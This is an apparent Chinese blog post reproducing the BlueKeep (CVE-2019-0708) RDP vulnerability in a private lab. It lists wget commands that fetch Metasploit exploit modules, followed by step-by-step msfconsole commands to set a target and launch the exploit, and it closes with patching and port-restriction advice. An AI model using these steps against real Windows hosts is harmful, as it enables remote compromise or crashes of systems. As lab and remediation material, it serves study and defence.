CVE2019-0708漏洞复现

这几天关于0708漏洞的复现也是沸沸扬扬的,刚好趁着今天有时间自己来操作一波,此次操作的靶机和攻击机都是本人自己搭建的虚拟环境,本教程仅供学习交流~~~

漏洞复现

攻击机:kali系统 ip地址:192.168.107.128在这里插入图片描述
被攻击机:Windows Server 2008 R2 Standard ip地址:192.168.107.145在这里插入图片描述
这里08的系统是我自己在网上下载的,默认也是就打了40个补丁,可以通过systeminfo查看补丁情况,由于都是在虚拟机中搭建的,所以网络设置为NAT模式,保证kali和win2008在同一网段中可以ping通。
在kali中启动msf,输入命令:msfconsole
利用wget 下载0708四件套:

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

msf启动的时候会提示:No database support: No database YAML file,说明数据库没启动,运行如下命令即可:

systemctl start postgresql
systemctl enable postgresql
msfdb inti

在msf中reload_all重载ms模块
搜索0708的攻击内核模块:search bluekeep / search 0708
在这里插入图片描述
选择攻击模块:use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
在这里插入图片描述
查看exploit设置:show options
在这里是是插入图片描述这里rhosts就是目标机器的IP地址
设置攻击目标:set rhosts 192.168.107.145
在这里插入图片描述
查看目标环境:show targets
在这里插入图片描述
选择目标环境:set target ?这里?是需要选择的环境类型在这里插入图片描述
开始攻击:run/exploit
这里作者在自己08系统和03中测试一直是蓝屏状态,但是看网上有其他作者复现的是直接可以返回session。

漏洞的修复

  1. 及时打对应系统的安全补丁
  2. 关闭3389端口或添加防火墙安全策略限制对3389端口的访问
  3. 打不了补丁的可以开启远程桌面(网络级别身份验证(NLA)),可以临时防止漏洞攻击
发布了23 篇原创文章 · 获赞 30 · 访问量 7万+

猜你喜欢

转载自blog.csdn.net/cj_Allen/article/details/104106682